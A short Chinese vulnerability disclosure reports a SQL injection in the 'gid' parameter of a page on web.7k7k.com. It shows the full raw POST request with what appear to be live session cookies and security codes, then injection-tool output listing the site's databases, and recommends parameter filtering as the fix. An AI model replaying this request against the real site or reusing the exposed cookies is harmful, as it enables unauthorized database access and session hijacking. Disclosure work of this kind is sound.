奇客星空某分站SQL注射漏洞下载

奇客星空某分站SQL注射漏洞

相关页面：

http://web.7k7k.com/source/cms/newServer.php

post参数：gid

post包：

 

POST /source/cms/newServer.php HTTP/1.1

Content-Length: 25

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://web.7k7k.com:80/

Cookie: PHPSESSID=qt88ga5hqc6pttdclihba904m6; timekey=dbedc8b5bd73801fa7e49e8312f358d7; username=cdqmvdsw; identity=cdqmvdsw; nickname=196505246; userid=483938663; kk=196505246; logintime=1394680619; k7_lastlogin=1394681640; loginfrom=0011; avatar=http%3A%2F%2Fsface.7k7kimg.cn%2Fuicons%2Fphoto_default_s.png; securitycode=3c91523a8ca0e001c4606e9353ea5cdc; k7_lastlogin=2014-03-13+11%3A16%3A59; web_uniques=482237872; k7_gamekey=%5B%2221_1%22%2C%2221_12%22%5D; k7_gamelist=%5B%7B%22sname%22%3A%22%5Cu5929%5Cu5730%5Cu82f1%5Cu96c4%5B%5Cu53cc%5Cu7ebf%5Cu4e00%5Cu533a%5D%22%2C%22key%22%3A%22tdyx%22%2C%22gid%22%3A21%2C%22server_id%22%3A%221%22%7D%2C%7B%22sname%22%3A%22%5Cu5929%5Cu5730%5Cu82f1%5Cu96c4%5B%5Cu53cc%5Cu7ebf12%5Cu533a%5D%22%2C%22key%22%3A%22tdyx%22%2C%22gid%22%3A21%2C%22server_id%22%3A%2212%22%7D%5D; yourplayedwebgames=dcj%257C%25E9%25BE%2599%25E7%25BA%25B9%25E6%2588%2598%25E5%259F%259F%252Chp2%257C%25E7%2594%25BB%25E7%259A%25AE2%252Csq%257C%25E7%25A5%259E%25E6%259B%25B2%252Cqjll%257C%25E5%25A5%2587%25E8%25BF%25B9%25E6%259D%25A5%25E4%25BA%2586%252Csctx%257C%25E7%25A5%259E%25E5%2588%259B%25E5%25A4%25A9%25E4%25B8%258B%252Ctdyx%257C%25E5%25A4%25A9%25E5%259C%25B0%25E8%258B%25B1%25E9%259B%2584

Host: web.7k7k.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*



gid=7

成功注入：

跑出的数据库：

available databases [2]:

[*] information_schema

[*] web7k

web7k的表：[221 tables]

表就不列了，保护厂商，点到为止，呼呼

修复方案：

过滤参数